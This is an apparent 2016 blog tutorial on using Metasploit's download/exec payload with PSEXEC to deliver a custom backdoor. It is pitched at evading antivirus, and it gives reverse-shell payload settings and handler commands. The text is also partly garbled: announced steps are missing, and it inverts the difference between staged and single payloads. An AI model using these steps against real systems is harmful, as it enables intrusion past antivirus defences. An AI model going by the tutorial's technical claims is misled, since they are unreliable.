Ready to Start Your Career?
June 21, 2016
Payload Customization with Metasploit
June 21, 2016
Why would we need custom payloads? Likely in situations where we launched Metasploit, but no session is created or it seems like the Antivirus software got popped.Being a penetration tester, you have to overcome. It always seems like antivirus software is a hurdle. The best possible way to avoid antivirus software is to use custom payloads.Create your own custom payload, and then you won’t have to worry about an antivirus signature catching your payload! It gives you the litheness to go after any target.Note: These tools and Tools and articles are there for helping you doing so, including the Veil framework.I'll cover Veil Framework in this custom payload series. Let's begin...You've built your custom payload, so what’s next? What's the procedure for making it operational? What about delivery and execution at victim’s machine?Start with Download/Exec Payload available in Metasploit. It's a tremendous option for delivering a custom payload to a target. You can even use it with memory corruption exploits i.e. Buffer Overflow, authenticated attacks like PSEXEC. In this Metasploit payload, you can use your custom payload with the Meterpreter.You need three things for the usage of Download/Exec payload:
- Setup website from which the victim can download your custom Trojan/Backdoor.
- Setup a Metasploit handler to receive the connection from your custom backdoor.
- Create an exploit to deliver your custom payload.
“set payload windows/meterpreter/reverse_tcp”
If it is a command prompt then you would type
“set payload windows/shell/reverse_tcp”My Python backdoor sends a command prompt, so I'll use:
“windows/shell/reverse_tcp”This “single” payload doesn’t use a stagger and expect a connection from a shell. Do not confuse this with the “windows/shell_reverse_tcp” since “windows/shell_reverse_tcp” which expects a connection from a stagger, not a shell.For better understanding, check my write-ups on: https://www.cybrary.it/0p3n/metasploit-advanced/https://www.cybrary.it/0p3n/metasploit-advanced-part-ii/https://www.cybrary.it/0p3n/metasploit-advanced-part-iii/ Let's continue...Setting lhost to 127.0.0.1, set your lport like 80 - as my payload is set to send a command prompt to port 80. Start multi-handler as a background task. You can use “-j” options that will start the multi-handler as a “job” that runs in the background. 3 - Exploit and deliver the payloadWith your handler in the background waiting to receive a connection, you’re ready to exploit the target. I’ll use PSEXEC.Initially, I use “windows/smb/psexec” and set it up with the correct user and password for the target. Then, I set my payload “set PAYLOAD download/exec”The options are simple. You set the URL to point to the custom payload on you web server in step 1. You can change the name of the file that will be saved to the target if you like. Finally, type “exploit” and you'll see it download from your website. A shell will appear in your handler. Please Note: For those who want greater understating on PSEXEC, I'll cover this in my next write-up.Stay Linked!!!Ali Tabish